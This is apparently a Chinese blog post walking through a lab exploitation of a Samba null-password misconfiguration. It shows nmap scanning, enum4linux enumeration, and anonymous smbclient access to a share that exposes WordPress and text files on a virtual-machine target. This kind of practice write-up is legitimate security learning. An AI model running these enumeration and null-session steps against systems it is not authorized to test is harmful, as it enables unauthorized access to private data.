samba空口令利用

root@kali:~# nmap -Pn 192.168.174.144

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-12 10:44 EST

Nmap scan report for 192.168.174.144

Host is up (0.0011s latency).

Not shown: 994 closed ports

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds

3306/tcp open mysql

6667/tcp open irc

MAC Address: 00:0C:29:A2:81:40 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds

存在samba服务

root@kali:~# enum4linux -U 192.168.174.144 //获取用户列表

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Dec 12 10:45:45 2020

==========================

| Target Information |

==========================

Target ........... 192.168.174.144

RID Range ........ 500-550,1000-1050

Username ......... ''

Password ......... ''

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=======================================================

| Enumerating Workgroup/Domain on 192.168.174.144 |

=======================================================

[+] Got domain/workgroup name: WORKGROUP

========================================

| Session Check on 192.168.174.144 |

========================================

[+] Server 192.168.174.144 allows sessions using username '', password ''

==============================================

| Getting domain SID for 192.168.174.144 |

==============================================

Domain Name: WORKGROUP

Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

================================

| Users on 192.168.174.144 |

================================

Use of uninitialized value $users in print at ./enum4linux.pl line 874.

Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.

Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

enum4linux complete on Sat Dec 12 10:45:45 2020

root@kali:~# smbclient -L 192.168.174.144 //显示服务器端所分享出来的所有资源

Enter WORKGROUP oot's password:

    Sharename Type Comment

    --------- ---- -------

    print$ Disk Printer Drivers

    share$ Disk Sumshare

    IPC$ IPC IPC Service (Web server)

SMB1 disabled -- no workgroup available

root@kali:~# smbclient //192.168.174.144/print$

Enter WORKGROUP oot's password:

tree connect failed: NT_STATUS_ACCESS_DENIED

root@kali:~# smbclient //192.168.174.144/IPC$

Enter WORKGROUP oot's password:

Try "help" to get a list of possible commands.

smb: > ls

NT_STATUS_OBJECT_NAME_NOT_FOUND listing *

smb: > pwd

Current directory is \192.168.174.144IPC$

root@kali:~# smbclient //192.168.174.144/share$

Enter WORKGROUP oot's password:

Try "help" to get a list of possible commands.

smb: > ls

.             D   0     Tue Aug 15 07:05:52 2017

..             D   0    Mon Aug 14 08:34:47 2017

wordpress        D   0     Tue Aug 15 07:21:08 2017

Backnode_files     D   0    Mon Aug 14 08:08:26 2017

wp             D   0    Tue Aug 15 06:51:23 2017

deets.txt         N   139  Mon Aug 14 08:20:05 2017

robots.txt        N   92   Mon Aug 14 08:36:14 2017

todolist.txt       N   79   Mon Aug 14 08:39:56 2017

apache           D   0   Mon Aug 14 08:35:19 2017

index.html         N   36072   Sun Aug 6 01:02:15 2017

info.php          N    20     Tue Aug 15 06:55:19 2017

test             D   0      Mon Aug 14 08:35:10 2017

old             D    0      Mon Aug 14 08:35:13 2017

 

       3029776 blocks of size 1024. 1456448 blocks available

smb: >

博客园的空格无力吐槽